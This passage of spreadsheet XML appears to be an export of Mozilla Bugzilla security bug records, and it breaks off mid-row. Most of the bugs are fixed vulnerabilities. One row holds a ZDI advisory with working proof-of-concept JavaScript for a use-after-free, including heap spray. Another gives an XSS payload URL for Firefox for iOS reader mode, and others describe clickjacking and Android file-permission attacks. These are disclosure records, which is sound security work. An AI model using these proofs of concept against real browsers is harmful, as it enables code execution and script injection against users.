      <c r="G604" t="n">
        <v>6</v>
      </c>
      <c r="H604" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I604" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J604" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K604" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L604" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M604" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N604" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O604" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P604" t="inlineStr"/>
      <c r="Q604" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R604" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S604" t="inlineStr">
        <is>
          <t>Firefox 3 beta3</t>
        </is>
      </c>
      <c r="T604" t="n">
        <v>1</v>
      </c>
      <c r="U604" t="n">
        <v>0</v>
      </c>
      <c r="V604" t="n">
        <v>10</v>
      </c>
      <c r="W604" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9b3pre) Gecko/2008013009 Firefox/3.0b3pre
Its no longer possible to subscribe to a RSS Feed. When you click on the RSS icon on a Website to add a RSS Feed, the Feed Preview comes up (the UI looks at least on mac a little funky now), Click on the Subscribe now button....nothing happens....
Reproduced on Mac and Windows.</t>
        </is>
      </c>
      <c r="X604" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="605">
      <c r="A605" t="n">
        <v>1850200</v>
      </c>
      <c r="B605" t="inlineStr">
        <is>
          <t>2023-08-25 21:04:28 -0700</t>
        </is>
      </c>
      <c r="C605" t="inlineStr">
        <is>
          <t>HTTPS-Only mode bypass through clickjacking</t>
        </is>
      </c>
      <c r="D605" t="inlineStr">
        <is>
          <t>2024-06-02 18:30:56 -0700</t>
        </is>
      </c>
      <c r="E605" t="n">
        <v>1</v>
      </c>
      <c r="F605" t="n">
        <v>1</v>
      </c>
      <c r="G605" t="n">
        <v>3</v>
      </c>
      <c r="H605" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I605" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J605" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K605" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L605" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M605" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N605" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O605" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P605" t="inlineStr">
        <is>
          <t>[adv-main120+][reporter-external] [client-bounty-form] [verif?][domsecurity-active]</t>
        </is>
      </c>
      <c r="Q605" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R605" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S605" t="inlineStr">
        <is>
          <t>120 Branch</t>
        </is>
      </c>
      <c r="T605" t="n">
        <v>1</v>
      </c>
      <c r="U605" t="n">
        <v>0</v>
      </c>
      <c r="V605" t="n">
        <v>22</v>
      </c>
      <c r="W605" t="inlineStr">
        <is>
          <t>Created attachment 9350319
https-only-mode-click-jacking-bypass.mov
As well as the TLS certificate exception screen pointed out by CVE-2023-34414, HTTPS-Only mode disable button does not have activation-delay implemented. This could be used for clickjacking with human response time delays.
In the following example site, when the mouse touches the button labeled Click Me, the screen switches to the HTTPS-Only Mode warning page. If the user presses the button even a little late, the button to disable HTTPS-Only Mode is inadvertently pressed, and the page transition to the http: page is succeeded.
https://csrf.jp/2023/https-only/</t>
        </is>
      </c>
      <c r="X605" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="606">
      <c r="A606" t="n">
        <v>535806</v>
      </c>
      <c r="B606" t="inlineStr">
        <is>
          <t>2009-12-18 08:44:17 -0800</t>
        </is>
      </c>
      <c r="C606" t="inlineStr">
        <is>
          <t>XUL cache lets HTML and XUL share stylesheets, can allow remote webpages to break browser UI</t>
        </is>
      </c>
      <c r="D606" t="inlineStr">
        <is>
          <t>2010-03-24 00:29:02 -0700</t>
        </is>
      </c>
      <c r="E606" t="n">
        <v>1</v>
      </c>
      <c r="F606" t="n">
        <v>1</v>
      </c>
      <c r="G606" t="n">
        <v>3</v>
      </c>
      <c r="H606" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I606" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J606" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K606" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L606" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M606" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N606" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O606" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P606" t="inlineStr">
        <is>
          <t>[sg:low]</t>
        </is>
      </c>
      <c r="Q606" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R606" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S606" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T606" t="n">
        <v>1</v>
      </c>
      <c r="U606" t="n">
        <v>0</v>
      </c>
      <c r="V606" t="n">
        <v>23</v>
      </c>
      <c r="W606" t="inlineStr">
        <is>
          <t>Created attachment 418384
Testcase (remote HTML)
This came up as a Songbird issue. I am marking it as security sensitive since there seems to be the possibility of abuse by remote webpages.
Stylesheets loaded from chrome land in XUL cache, subsequent requests get a cached copy. Usually this is not a problem. However, if an HTML page requests a stylesheet this stylesheet seems to be converted before it is put into XUL cache, e.g. all attribute names are lowercased. If a XUL document tries to use that stylesheet later it gets the version with lowercased attributes, consequently the selectors no longer match correctly. Here is an example (three files that need to be put into a chrome location):
test.html:
&lt;link rel="stylesheet" href="test.css" type="text/css"&gt;
&lt;iframe src="test.xul"&gt;&lt;/iframe&gt;
test.css:
label {
  color: red;
}
label[someAttr] {
  color: green;
}
test.xul:
&lt;?xml-stylesheet href="test.css" type="text/css"?&gt;
&lt;page xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"&gt;
  &lt;label someAttr="true" value="This should be green"/&gt;
&lt;/page&gt;
If test.html is opened with XUL cache disabled you will see green text, with XUL cache enabled the text will be red because the selectors no longer apply correctly in the XUL document.
This issue can also be triggered by remote webpages. If you used bookmarks UI already, restart your browser. Then open the testcase, it will load a stylesheet used by Firefox' bookmarks UI. Now click the star symbol in location bar to bookmark the current page. Click again to edit the bookmark - try changing the folder and note that the icon in the menulist element doesn't change. This icon is added by CSS styles dependent on a mixed-case attribute name which doesn't work if the stylesheet was previously loaded by an HTML page.
Reproduced in Firefox 3.5.6 and 3.6b5. The issue doesn't occur in Minefield, it doesn't seem to convert attribute names in stylesheets to lowercase.</t>
        </is>
      </c>
      <c r="X606" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="607">
      <c r="A607" t="n">
        <v>830399</v>
      </c>
      <c r="B607" t="inlineStr">
        <is>
          <t>2013-01-14 09:33:59 -0800</t>
        </is>
      </c>
      <c r="C607" t="inlineStr">
        <is>
          <t>compartment mismatch in nsXMLHttpRequest::GetInterface (with addon?)</t>
        </is>
      </c>
      <c r="D607" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E607" t="n">
        <v>1</v>
      </c>
      <c r="F607" t="n">
        <v>1</v>
      </c>
      <c r="G607" t="n">
        <v>3</v>
      </c>
      <c r="H607" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I607" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J607" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K607" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L607" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M607" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N607" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O607" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P607" t="inlineStr">
        <is>
          <t>[adv-main19+][adv-esr1703+]</t>
        </is>
      </c>
      <c r="Q607" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R607" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S607" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T607" t="n">
        <v>1</v>
      </c>
      <c r="U607" t="n">
        <v>0</v>
      </c>
      <c r="V607" t="n">
        <v>28</v>
      </c>
      <c r="W607" t="inlineStr">
        <is>
          <t>There are a number of these, but they all appear to be from the same Linux user, a few minutes apart.
2 JS_GetGlobalForObject 	js/src/jsapi.cpp:2241
3 nsXMLHttpRequest::GetInterface 	content/base/src/nsXMLHttpRequest.cpp:3874
4 mozilla::dom::XMLHttpRequestBinding::getInterface 	obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1197
5 mozilla::dom::XMLHttpRequestBinding::genericMethod 	obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1277
https://crash-stats.mozilla.com/report/index/48f6700a-c15b-4093-8450-82d6b2130112
https://crash-stats.mozilla.com/report/index/6a822b01-4346-417e-862b-113142130112
https://crash-stats.mozilla.com/report/index/29b85a8f-c538-42f0-afa2-f4de42130112
https://crash-stats.mozilla.com/report/index/623f5ac7-5823-4427-95d1-5222d2130112
This user has BitTorrent_WebUI_2@firefox.alexisbrunet.com, Firebug, and Sharemenot, so perhaps one of those is the underlying problem.</t>
        </is>
      </c>
      <c r="X607" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="608">
      <c r="A608" t="n">
        <v>708198</v>
      </c>
      <c r="B608" t="inlineStr">
        <is>
          <t>2011-12-06 23:48:35 -0800</t>
        </is>
      </c>
      <c r="C608" t="inlineStr">
        <is>
          <t>AttributeChildRemoved Use-After-Free (ZDI-CAN-1413)</t>
        </is>
      </c>
      <c r="D608" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E608" t="n">
        <v>1</v>
      </c>
      <c r="F608" t="n">
        <v>1</v>
      </c>
      <c r="G608" t="n">
        <v>3</v>
      </c>
      <c r="H608" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I608" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J608" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K608" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L608" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M608" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N608" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O608" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P608" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q608" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R608" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S608" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T608" t="n">
        <v>1</v>
      </c>
      <c r="U608" t="n">
        <v>0</v>
      </c>
      <c r="V608" t="n">
        <v>19</v>
      </c>
      <c r="W608" t="inlineStr">
        <is>
          <t>Created attachment 579608
PoC from comment 0
ZDI-CAN-1413: Mozilla Firefox AttributeChildRemoved Use-After-Free
Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
TippingPoint has identified a vulnerability affecting the following
products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Version(s) Tested: Mozilla Firefox 8.0.1
Platform(s) Tested: Windows XP SP3
---------------------
Vulnerability details
---------------------
Version(s) Tested: Mozilla Firefox 8.0.1
Platform(s) Tested: Windows XP SP3
---------------------
Vulnerability details
---------------------
Under certain circumstances, removal of child nodes from the
nsDOMAttribute can allow for a child to still be accessible after
removal due to a premature notification of AttributeChildRemoved.
Please observe the code below from base/src/nsDOMAttribute.cpp:
void nsDOMAttribute::doRemoveChild(bool aNotify)
{
  if (aNotify) {
    nsNodeUtils::AttributeChildRemoved(this, mChild);
  }
  static_cast&lt;nsTextNode*&gt;(mChild)-&gt;UnbindFromAttribute();
  NS_RELEASE(mChild);
  mFirstChild = nsnull;
}
As can be seen above, a call to the function AttributeChildRemoved()
happens before mFirstChild is set to NULL. Registered mutation
observers implementing interface nsIMutationObserver2 will have
callback function AttributeChildRemoved. Since mFirstChild is not set
to NULL until after this call is made, this means the removed child
will be accessible after it has been removed. This use-after-free
allows for arbitrary code execution by an attacker.
The code below can used to trigger and demonstrate the vulnerability:
---------------
Begin Code Snip
---------------
&lt;html&gt;
&lt;head&gt;
&lt;script&gt;
function run() {
  var attr = document.createAttribute("foo");
  attr.value = "bar";
  var ni = document.createNodeIterator(
    attr, NodeFilter.SHOW_ALL,
    {acceptNode: function(node) { return NodeFilter.FILTER_ACCEPT; }},
    false);
  ni.nextNode();
  ni.nextNode();
  ni.previousNode();
  attr.value = null;
  // gc &amp; heap spray
  const addr = unescape("%uc3c4%uc1c2");
  var container = new Array();
  var small = addr;
  while (small.length != 30)
    small += addr;
  for (i = 0; i &lt; 1024*1024*2; ++i)
    container.push(unescape(small));
  ni.referenceNode;
  alert("PoC failed");
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body onload="run();"&gt;
&lt;/body&gt;
&lt;/html&gt;
----------------
End Of Code Snip
----------------
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht</t>
        </is>
      </c>
      <c r="X608" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="609">
      <c r="A609" t="n">
        <v>1843038</v>
      </c>
      <c r="B609" t="inlineStr">
        <is>
          <t>2023-07-12 05:15:17 -0700</t>
        </is>
      </c>
      <c r="C609" t="inlineStr">
        <is>
          <t>Stack buffer overflow in NSSCipherStrategy::DeserializeKey</t>
        </is>
      </c>
      <c r="D609" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:02 -0700</t>
        </is>
      </c>
      <c r="E609" t="n">
        <v>1</v>
      </c>
      <c r="F609" t="n">
        <v>1</v>
      </c>
      <c r="G609" t="n">
        <v>3</v>
      </c>
      <c r="H609" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I609" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J609" t="inlineStr">
        <is>
          <t>Storage: Quota Manager</t>
        </is>
      </c>
      <c r="K609" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N609" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O609" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P609" t="inlineStr">
        <is>
          <t>[adv-main116+] [adv-ESR115.1+] [adv-ESR102.14+]</t>
        </is>
      </c>
      <c r="Q609" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R609" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S609" t="inlineStr">
        <is>
          <t>117 Branch</t>
        </is>
      </c>
      <c r="T609" t="n">
        <v>1</v>
      </c>
      <c r="U609" t="n">
        <v>0</v>
      </c>
      <c r="V609" t="n">
        <v>18</v>
      </c>
      <c r="W609" t="inlineStr">
        <is>
          <t>Created attachment 9343481
key_overflow_patch.diff
When deserializing a DecryptingInputStream, we call NSSCipherStrategy::DeserializeKey 
on an untrusted input:
```C++
template &lt;typename CipherStrategy&gt;
bool DecryptingInputStream&lt;CipherStrategy&gt;::Deserialize(
    const mozilla::ipc::InputStreamParams&amp; aParams) {
  MOZ_ASSERT(aParams.type() ==
             mozilla::ipc::InputStreamParams::TEncryptedFileInputStreamParams);
  const auto&amp; params = aParams.get_EncryptedFileInputStreamParams();
  nsCOMPtr&lt;nsIFileInputStream&gt; stream;
  nsFileInputStream::Create(NS_GET_IID(nsIFileInputStream),
                            getter_AddRefs(stream));
  nsCOMPtr&lt;nsIIPCSerializableInputStream&gt; baseSerializable =
      do_QueryInterface(stream);
  if (NS_WARN_IF(
          !baseSerializable-&gt;Deserialize(params.fileInputStreamParams()))) {
    return false;
  }
  Init(WrapNotNull&lt;nsCOMPtr&lt;nsIInputStream&gt;&gt;(std::move(stream)),
       params.blockSize());
  mKey.init(mCipherStrategy.DeserializeKey(params.key())); // &lt;-- here
  if (NS_WARN_IF(
          NS_FAILED(mCipherStrategy.Init(CipherMode::Decrypt, params.key())))) {
    return false;
  }
  return true;
}
```
This asserts that the size is correct, but does not check it at runtime in a release build:
```C++
NSSCipherStrategy::KeyType NSSCipherStrategy::DeserializeKey(
    const Span&lt;const uint8_t&gt;&amp; aSerializedKey) {
  KeyType res;
  MOZ_ASSERT(res.size() == aSerializedKey.size());
  std::copy(aSerializedKey.cbegin(), aSerializedKey.cend(), res.begin());
  return res;
}
```
This means that the `std::copy` call can overflow the allocated stack buffer. I've provided a patch which will convert an outgoing request body of size 0x1234 to an EncryptedInputStream and trigger this issue. I don't seem to be able to attach multiple files to the report, so I'll add my server script as a comment.
I've only tested this on linux, where the incoming IPC message is processed on the main thread. In my build this means that this appears not to be exploitable (there is nothing on the stack which can be corrupted that is used prior to the stack-cookie check), so I'm reporting this without applying a deadline. 
I've still marked this as a security bug, as it may still be exploitable on other platforms/compilers or if there are situations in which other threads handle incoming IPC messages; I'm not sufficiently familiar with Firefox' threading model.</t>
        </is>
      </c>
      <c r="X609" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="610">
      <c r="A610" t="n">
        <v>844832</v>
      </c>
      <c r="B610" t="inlineStr">
        <is>
          <t>2013-02-25 06:59:50 -0800</t>
        </is>
      </c>
      <c r="C610" t="inlineStr">
        <is>
          <t>Installation directory rights allows all</t>
        </is>
      </c>
      <c r="D610" t="inlineStr">
        <is>
          <t>2024-05-30 08:00:42 -0700</t>
        </is>
      </c>
      <c r="E610" t="n">
        <v>1</v>
      </c>
      <c r="F610" t="n">
        <v>1</v>
      </c>
      <c r="G610" t="n">
        <v>6</v>
      </c>
      <c r="H610" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I610" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J610" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K610" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L610" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M610" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N610" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O610" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P610" t="inlineStr">
        <is>
          <t>[adv-main20+] attack from installed malicious Android app.</t>
        </is>
      </c>
      <c r="Q610" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R610" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S610" t="inlineStr">
        <is>
          <t>Firefox 22</t>
        </is>
      </c>
      <c r="T610" t="n">
        <v>1</v>
      </c>
      <c r="U610" t="n">
        <v>0</v>
      </c>
      <c r="V610" t="n">
        <v>32</v>
      </c>
      <c r="W610" t="inlineStr">
        <is>
          <t>Date: Mon, 25 Feb 2013 10:47:20 +0900
From: Shuichiro Suzuki &lt;suzuki@fourteenforty.jp&gt;
To: security@mozilla.org
Subject: Security Bug in Firefox for Mobile(Android)
-----//-----
Dear Sir/Madam
Hi. I'm a security researcher in Fourteenforty Research Institute in Japan.
I found a security related bug in Firefox for Android and report it here.
Abstract:
The installation of the Firefox for Android (FFA) makes app_tmp directory
world readable and writable(777).
With this configuration other applications(might be a malcode) can replace
any addons installed through FFA. This leads installing mal-addons without
any awareness from users.
Scenario:
A user installs an android app (which is actually malware) and run it.
Then the user tries to install a legitimate addon from Mozilla Addons site(https://addons.mozilla.org).
FFA download the addon into temporary directory(app_tmp dir) and keep it there and show dialog to ask if
the user really installs it.
At this point the malware running background can replace the addon in the temporary directory since the app_tmp directory permission is 777.
When the user tap on "yes" on the dialog FFA installs the replaced addon with the name of the original(downloaded) addon's name.
Since addons for FFA has a great power of stealing any data in the browser this may leads security problem.
Technical Detail:
The main problem here is that the app_tmp directory's permission is 777.
I do not know how this directory is used but this can be 700 (Since it seems that other apps do not need to know what is in the dir)
And also you should ensure that downloaded and installed addons are the same thing.
Others:
Android has a class "FileObserver" which notifies an application when a file or directory content is changed.
The malware can use this class with path "/data/data/org.mozilla.firefox/app_tmp". This enables the malware
to replace the addon downloaded by FFA just after download is finished and just before the user tap on "yes" button on the installation dialog.
The malware do not need any special permission.
This may not a problem in Windows platform since its security model is different from Android one.
In Windows any software other than Firefox may be able to replace any addons within the same user's context.
Since security concept of the Android is different from Windows's one I consider this as a security problem.
Best regards,
Shuichiro Suzuki
Fourteenforty Research Institute
suzuki@fourteenforty.jp</t>
        </is>
      </c>
      <c r="X610" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="611">
      <c r="A611" t="n">
        <v>444077</v>
      </c>
      <c r="B611" t="inlineStr">
        <is>
          <t>2008-07-08 03:21:36 -0700</t>
        </is>
      </c>
      <c r="C611" t="inlineStr">
        <is>
          <t>XPCNativeWrapper pollution using chrome JS</t>
        </is>
      </c>
      <c r="D611" t="inlineStr">
        <is>
          <t>2009-01-27 17:25:49 -0800</t>
        </is>
      </c>
      <c r="E611" t="n">
        <v>1</v>
      </c>
      <c r="F611" t="n">
        <v>1</v>
      </c>
      <c r="G611" t="n">
        <v>3</v>
      </c>
      <c r="H611" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I611" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J611" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K611" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L611" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M611" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N611" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O611" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P611" t="inlineStr">
        <is>
          <t>[sg:critical] fixed by 441087</t>
        </is>
      </c>
      <c r="Q611" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R611" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S611" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T611" t="n">
        <v>1</v>
      </c>
      <c r="U611" t="n">
        <v>0</v>
      </c>
      <c r="V611" t="n">
        <v>10</v>
      </c>
      <c r="W611" t="inlineStr">
        <is>
          <t>It's possible to modify an implicit XPCNativeWrapper within a function loaded
from chrome: url without using eval-like methods nor __defineGetter__.  (See
also the second paragraph of bug 387390 comment #21.)</t>
        </is>
      </c>
      <c r="X611" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="612">
      <c r="A612" t="n">
        <v>1850019</v>
      </c>
      <c r="B612" t="inlineStr">
        <is>
          <t>2023-08-24 08:44:17 -0700</t>
        </is>
      </c>
      <c r="C612" t="inlineStr">
        <is>
          <t>XSS on the domain reader in the firefox browser application for IOS</t>
        </is>
      </c>
      <c r="D612" t="inlineStr">
        <is>
          <t>2024-09-16 00:04:15 -0700</t>
        </is>
      </c>
      <c r="E612" t="n">
        <v>1</v>
      </c>
      <c r="F612" t="n">
        <v>1</v>
      </c>
      <c r="G612" t="n">
        <v>2</v>
      </c>
      <c r="H612" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I612" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J612" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K612" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L612" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M612" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N612" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O612" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P612" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q612" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R612" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S612" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T612" t="n">
        <v>0</v>
      </c>
      <c r="U612" t="n">
        <v>0</v>
      </c>
      <c r="V612" t="n">
        <v>23</v>
      </c>
      <c r="W612" t="inlineStr">
        <is>
          <t>Hi team.
As explained in https://hackerone.com/reports/2117521, I will be moving a vulnerability issue in an IOS app, which should be reported on the bugzilla form.
I found XSS in the Reader mode feature on the Firefox for IOS application, maybe this is also affected on Android.
I see that the domain of the reader feature is http://localhost:6571,
You can see the domain reader when opening https://hackerone.com/irwanjugabro, and the reader detects "connections is not secure" when you use the reader feature.
production steps:
1. download the firefox browser for IOS
2. then open the domain from the following reader features:
- http://localhost:6571/reader-mode/page?url=javascript:alert(document.domain)
3. after that, then click on the reader mode feature, then XSS will be triggered, because the redirect url that has been set to be javascript:alert(1)
# Impact
XSS on the domain reader in the firefox browser application for IOS</t>
        </is>
      </c>
      <c r="X612" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="613">
      <c r="A613" t="n">
        <v>1133162</v>
      </c>
      <c r="B613" t="inlineStr">
        <is>
          <t>2015-02-13 19:24:17 -0800</t>
        </is>
      </c>
      <c r="C613" t="inlineStr">
        <is>
          <t>Add Treejack snippet to Firefox for Android page</t>
        </is>
      </c>
      <c r="D613" t="inlineStr">
        <is>
          <t>2015-02-18 14:06:21 -0800</t>
        </is>
      </c>
      <c r="E613" t="n">
        <v>1</v>
      </c>
      <c r="F613" t="n">
        <v>1</v>
      </c>
      <c r="G613" t="n">
        <v>5</v>
      </c>
      <c r="H613" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I613" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J613" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K613" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L613" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M613" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N613" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O613" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P613" t="inlineStr">
        <is>
          <t>u=sumo-team c=general p=0 s=2015.3</t>
        </is>
      </c>
      <c r="Q613" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R613" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S613" t="inlineStr">
        <is>
          <t>2015Q1</t>
        </is>
      </c>
      <c r="T613" t="n">
        <v>1</v>
      </c>
      <c r="U613" t="n">
        <v>0</v>
      </c>
      <c r="V613" t="n">
        <v>4</v>
      </c>
      <c r="W613" t="inlineStr">
        <is>
          <t>Please add this Treejack snippet to the Firefox for Android page:
